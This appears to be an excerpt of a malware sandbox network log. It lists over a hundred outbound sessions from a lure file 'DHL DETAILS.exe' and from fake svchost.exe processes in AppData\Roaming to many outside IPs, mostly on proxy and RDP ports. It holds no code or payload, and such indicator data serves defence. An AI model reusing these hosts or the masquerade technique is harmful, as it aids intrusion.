Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7483	192.168.2.5	53322	51.15.211.42	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7484	192.168.2.5	50275	125.227.225.157	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7485	192.168.2.5	53142	119.28.60.64	8090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7486	192.168.2.5	50075	207.180.234.220	37736	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7487	192.168.2.5	55969	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7488	192.168.2.5	56024	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7489	192.168.2.5	56028	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7490	192.168.2.5	54348	172.67.3.108	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7491	192.168.2.5	53159	47.106.76.196	8088	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7492	192.168.2.5	49415	27.65.114.8	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7493	192.168.2.5	53481	18.133.16.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7494	192.168.2.5	54023	94.131.64.157	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7495	192.168.2.5	55230	142.54.226.214	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7496	192.168.2.5	54312	177.93.45.154	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7497	192.168.2.5	53751	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7498	192.168.2.5	53753	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7499	192.168.2.5	54560	219.243.212.118	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7500	192.168.2.5	54179	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7501	192.168.2.5	56030	209.126.104.38	40053	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7502	192.168.2.5	55592	52.80.19.207	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7503	192.168.2.5	56051	162.214.227.68	52208	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7504	192.168.2.5	54023	94.131.64.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7505	192.168.2.5	54109	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7506	192.168.2.5	64908	27.65.240.157	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7507	192.168.2.5	55585	102.69.177.242	10081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7508	192.168.2.5	63244	159.223.71.71	52542	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7509	192.168.2.5	56819	142.54.226.214	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7510	192.168.2.5	56655	39.99.144.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7511	192.168.2.5	56157	47.91.104.88	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7512	192.168.2.5	56894	162.240.72.139	25591	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7513	192.168.2.5	50288	98.181.137.80	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7514	192.168.2.5	63495	37.187.73.7	10362	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7515	192.168.2.5	56772	41.223.232.117	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7516	192.168.2.5	51334	107.180.88.41	37597	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7517	192.168.2.5	51712	66.228.35.209	56560	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7518	192.168.2.5	49211	95.31.5.29	51528	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7519	192.168.2.5	56858	172.104.251.179	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7520	192.168.2.5	63518	61.7.138.243	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7521	192.168.2.5	51377	107.180.95.177	58230	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7522	192.168.2.5	63596	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7523	192.168.2.5	53752	192.111.137.35	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7524	192.168.2.5	51305	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7525	192.168.2.5	57116	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7526	192.168.2.5	63574	177.234.244.174	32213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7527	192.168.2.5	57125	195.87.217.75	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7528	192.168.2.5	57404	142.54.226.214	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7529	192.168.2.5	51241	180.250.159.49	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7530	192.168.2.5	57107	193.151.130.114	8086	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7531	192.168.2.5	57401	185.38.111.1	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7532	192.168.2.5	53454	104.238.111.107	45883	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7533	192.168.2.5	57407	13.37.89.201	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7534	192.168.2.5	63645	51.75.125.208	48114	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7535	192.168.2.5	57413	221.224.44.91	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7536	192.168.2.5	50592	128.199.246.48	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7537	192.168.2.5	57494	147.75.92.251	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7538	192.168.2.5	53274	185.129.250.183	26777	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7539	192.168.2.5	57426	27.65.240.157	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7540	192.168.2.5	55229	147.124.212.31	30508	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7541	192.168.2.5	58027	104.16.106.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7542	192.168.2.5	57923	39.99.144.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7543	192.168.2.5	49271	113.53.3.242	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7544	192.168.2.5	56100	74.119.144.60	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7545	192.168.2.5	58072	38.162.23.127	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7546	192.168.2.5	58153	94.131.60.199	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7547	192.168.2.5	57929	43.231.22.228	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7548	192.168.2.5	57935	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7549	192.168.2.5	63613	45.11.95.165	6002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7550	192.168.2.5	58275	198.37.57.112	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7551	192.168.2.5	63831	188.215.245.235	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7552	192.168.2.5	63815	113.161.56.137	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7553	192.168.2.5	55707	138.2.73.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7554	192.168.2.5	58764	142.54.226.214	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7555	192.168.2.5	58262	160.153.245.187	31745	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7556	192.168.2.5	58768	177.234.244.174	32213	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7557	192.168.2.5	64080	164.92.86.113	60283	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7558	192.168.2.5	58808	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7559	192.168.2.5	58738	117.4.242.216	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7560	192.168.2.5	58771	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7561	192.168.2.5	59169	195.87.217.75	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7562	192.168.2.5	49553	45.11.95.165	5047	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7563	192.168.2.5	59455	3.127.62.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7564	192.168.2.5	49574	41.223.234.116	37259	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7565	192.168.2.5	58893	12.186.205.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7566	192.168.2.5	59622	114.156.77.107	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7567	192.168.2.5	59697	162.214.121.11	8989	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7568	192.168.2.5	59795	199.102.105.242	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7569	192.168.2.5	55787	192.252.208.70	14282	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7570	192.168.2.5	59643	39.99.144.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7571	192.168.2.5	58904	183.80.130.9	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7572	192.168.2.5	64150	148.72.206.84	14815	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7573	192.168.2.5	57092	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7574	192.168.2.5	49989	69.167.169.46	12903	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7575	192.168.2.5	64076	188.132.221.133	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7576	192.168.2.5	56031	98.178.72.21	10919	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7577	192.168.2.5	50098	96.9.74.55	33652	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7578	192.168.2.5	50164	91.134.140.160	2572	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7579	192.168.2.5	64437	64.227.108.25	31908	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7580	192.168.2.5	61117	104.16.226.6	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7581	192.168.2.5	60670	54.67.125.45	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7582	192.168.2.5	60758	172.93.213.177	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7583	192.168.2.5	50343	68.169.60.220	8380	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7584	192.168.2.5	61172	104.19.109.209	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7585	192.168.2.5	58718	50.63.12.101	17559	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7586	192.168.2.5	60376	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7587	192.168.2.5	60175	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7588	192.168.2.5	61188	74.119.144.60	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7589	192.168.2.5	59232	51.15.223.24	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7590	192.168.2.5	60926	91.134.140.160	49042	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7591	192.168.2.5	60612	103.120.6.46	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7592	192.168.2.5	61051	106.105.218.244	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7593	192.168.2.5	61195	18.167.191.223	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7594	192.168.2.5	54668	174.75.211.222	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7595	192.168.2.5	64253	84.47.145.189	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7596	192.168.2.5	60281	42.49.148.167	9001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7597	192.168.2.5	64348	66.228.33.190	17464	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7598	192.168.2.5	61141	172.67.181.9	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7599	192.168.2.5	59367	192.169.226.96	29618	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7600	192.168.2.5	59370	146.190.57.169	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7601	192.168.2.5	64403	82.210.56.251	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7602	192.168.2.5	64381	185.151.146.178	1234	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7603	192.168.2.5	52151	38.242.136.254	15625	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7604	192.168.2.5	64529	161.97.170.209	62291	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7605	192.168.2.5	64465	81.134.57.82	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7606	192.168.2.5	52689	37.187.77.58	52593	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7607	192.168.2.5	52273	103.109.59.209	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7608	192.168.2.5	59558	16.162.211.90	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7609	192.168.2.5	59884	37.187.77.58	59870	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7610	192.168.2.5	59661	51.158.105.107	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7611	192.168.2.5	59636	103.76.148.92	8181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7612	192.168.2.5	64669	212.110.188.189	34405	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7613	192.168.2.5	59739	162.241.50.179	31414	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7614	192.168.2.5	54491	153.19.91.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7615	192.168.2.5	64644	51.161.131.84	63055	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7616	192.168.2.5	64614	183.88.46.37	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7617	192.168.2.5	64839	75.119.145.154	25084	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7618	192.168.2.5	54642	45.11.95.165	6014	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7619	192.168.2.5	60449	162.214.165.203	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7620	192.168.2.5	57082	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7621	192.168.2.5	64795	105.112.140.218	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7622	192.168.2.5	61064	203.222.24.36	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7623	192.168.2.5	58163	192.111.137.35	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

